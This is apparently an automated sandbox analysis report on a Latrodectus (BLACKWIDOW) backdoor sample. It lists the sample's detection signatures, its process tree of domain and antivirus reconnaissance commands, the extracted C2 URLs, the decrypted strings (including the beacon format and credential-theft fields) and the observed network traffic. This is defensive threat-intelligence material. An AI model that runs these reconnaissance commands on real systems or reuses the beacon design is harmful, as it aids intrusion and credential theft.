Windows Analysis Report
360total.dll.dll

Overview

General Information

Sample name:360total.dll.dll
(renamed file extension from exe to dll)
Original sample name:360total.dll.exe
Analysis ID:1432373
MD5:bd3a3714ee9a071ebeb59ac91d9ebb5a
SHA1:55110a221f20a4ceec34c58d0179fa31f8c102e9
SHA256:4cf2b612939359977df51a32d2f63e2cb0c6c601e114b8e4812bd548d1db85fe
Tags:exe
Infos:

Detection

Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Deletes itself after installation
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • loaddll64.exe (PID: 3872 cmdline: loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6524 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 1960 cmdline: rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • rundll32.exe (PID: 180 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1 MD5: EF3179D498793BF4234F708D3BE28633)
          • cmd.exe (PID: 360 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ipconfig.exe (PID: 6428 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • cmd.exe (PID: 3848 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • systeminfo.exe (PID: 5840 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
              • WmiPrvSE.exe (PID: 1012 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • cmd.exe (PID: 5544 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • nltest.exe (PID: 4508 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
          • cmd.exe (PID: 6576 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • nltest.exe (PID: 6516 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
          • cmd.exe (PID: 6600 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 5856 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • cmd.exe (PID: 1472 cmdline: /c net view /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 2944 cmdline: net view /all MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • cmd.exe (PID: 4500 cmdline: /c net group "Domain Admins" /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 5496 cmdline: net group "Domain Admins" /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
              • net1.exe (PID: 5348 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • WMIC.exe (PID: 2508 cmdline: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7988 cmdline: /c net config workstation MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net.exe (PID: 2272 cmdline: net config workstation MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
              • net1.exe (PID: 1708 cmdline: C:\Windows\system32\net1 config workstation MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • cmd.exe (PID: 6832 cmdline: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 5136 cmdline: wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 3728 cmdline: findstr /V /B /C:displayName MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • cmd.exe (PID: 932 cmdline: /c whoami /groups MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6560 cmdline: MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6200 cmdline: rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 1964 cmdline: C:\Windows\system32\WerFault.exe -u -p 6200 -s 456 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • WerFault.exe (PID: 5952 cmdline: C:\Windows\system32\WerFault.exe -u -p 6200 -s 456 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 2364 cmdline: rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7896 cmdline: rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime MD5: EF3179D498793BF4234F708D3BE28633)
  • chrome.exe (PID: 3624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
Name: Unidentified 111 (Latrodectus), Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111
{"C2 url": ["https://jarinamaers.shop/live/", "https://startmast.shop/live/"]}
Source | Rule | Description | Author | Strings
00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |

Source | Rule | Description | Author | Strings
3.2.rundll32.exe.14614300000.2.raw.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
3.2.rundll32.exe.146142f0000.1.raw.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
3.2.rundll32.exe.146142f0000.1.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
4.2.rundll32.exe.237c16b0000.1.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
3.2.rundll32.exe.14614300000.2.unpack | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
Source: Process started; Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems); Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net group "Domain Admins" /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4500, ParentProcessName: cmd.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 5496, ProcessName: net.exe
Source: Process started; Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements); Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 5856, ProcessName: net.exe
Source: Process started; Author: Endgame, JHasenbusch (ported for oscd.community); Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6600, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 5856, ProcessName: net.exe
Source: Process started; Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'; Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1 , ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 180, ParentProcessName: rundll32.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 360, ProcessName: cmd.exe
No Snort rule has matched

AV Detection

Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack, Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://startmast.shop/live/"]}
Source: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll, ReversingLabs: Detection: 18%
Source: 360total.dll.dll, ReversingLabs: Detection: 18%
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack, String decryptor output (one decrypted string per line, in report order):
  /c ipconfig /all
  C:\Windows\System32\cmd.exe
  /c systeminfo
  C:\Windows\System32\cmd.exe
  /c nltest /domain_trusts
  C:\Windows\System32\cmd.exe
  /c net view /all /domain
  /c nltest /domain_trusts /all_trusts
  C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe
  /c net view /all
  C:\Windows\System32\cmd.exe
  &ipconfig=
  /c net group "Domain Admins" /domain
  C:\Windows\System32\cmd.exe
  /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
  C:\Windows\System32\wbem\wmic.exe
  /c net config workstation
  C:\Windows\System32\cmd.exe
  /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
  C:\Windows\System32\cmd.exe
  /c whoami /groups
  C:\Windows\System32\cmd.exe
  &systeminfo=
  &domain_trusts=
  &domain_trusts_all=
  &net_view_all_domain=
  &net_view_all=
  &net_group=
  &wmic=
  &net_config_ws=
  &net_wmic_av=
  &whoami_group=
  "pid":
  "%d",
  "proc":
  "%s",
  "subproc": [
  &proclist=[
  "pid":
  "%d",
  "proc":
  "%s",
  "subproc": [
  &desklinks=[
  *.*
  "%s"
  Update_%x
  Custom_update
  .dll
  .exe
  Updater
  "%s"
  rundll32.exe
  "%s", %s %s
  runnung
  :wtfbbq
  %s%s
  files/bp.dat
  %s\%d.dll
  %d.dat
  %s\%s
  init -zzzz="%s\%s"
  front
  /files/
  Facial
  !"$%&()*wp
  .exe
  Content-Type: application/x-www-form-urlencoded
  POST
  GET
  curl/7.88.1
  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  pN
  URLS
  COMMAND
  ERROR
  eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
  counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
  C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
  C:\WINDOWS\SYSTEM32\rundll32.exe %s
  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
  <html>
  <!DOCTYPE
  %s%d.dll
  12345
  &stiller=
  %s%d.exe
  LogonTrigger
  %x%x
  TimeTrigger
  PT0H%02dM
  %04d-%02d-%02dT%02d:%02d:%02d
  &mac=
  %02x
  :%02x
  PT0S
  &computername=%s
  &domain=%s
  ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  \*.dll
  %04X%04X%04X%04X%08X%04X
  %04X%04X%04X%04X%08X%04X
  \Registry\Machine\
  https://jarinamaers.shop/live/
  https://startmast.shop/live/
  AppData
  Desktop
  Startup
  Personal
  Local AppData
  Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  \update_data.dat
  pN
  URLS|%d|%s
Source: C:\Windows\System32\rundll32.exe, Code function: 3_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_000000018003BC0C
Source: C:\Windows\System32\rundll32.exe, Code function: 8_3_000001E3B57E5E5C CryptUnprotectData,RtlDeleteBoundaryDescriptor,8_3_000001E3B57E5E5C
Source: unknown, HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 20.42.73.28:443 -> 192.168.2.5:49779 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.84.207:443 -> 192.168.2.5:49781 version: TLS 1.2
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr

                      Spreading

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
                      Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CA350 FindFirstFileW,FindNextFileW,LoadLibraryW,4_2_00000237C16CA350
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,4_2_00000237C16C1A08
                      Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E16F4 FindFirstFileW,FindNextFileW,8_3_000001E3B57E16F4
                      Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E6604 FindFirstFileA,FindNextFileA,8_3_000001E3B57E6604
                      Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\
                      Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\
                      Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\
                      Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\
                      Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
                      Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\

                      Networking

                      Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.46.75 443
                      Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443
                      Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.84.207 443
                      Source: Malware configuration extractor URLs: https://jarinamaers.shop/live/
                      Source: Malware configuration extractor URLs: https://startmast.shop/live/
                      Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1714166397033Host: self.events.data.microsoft.comContent-Length: 7972Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox View IP Address: 239.255.255.250
                      Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                      Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
                      Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
                      Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
                      Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C8D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,4_2_00000237C16C8D90
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGOKysLEGIjDP9RPIyWXG6yqz56jt32vlp9eant7g-v2niK8akWf-XW5L6XSYUi8PVE7hkJBYZJgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-21; NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE
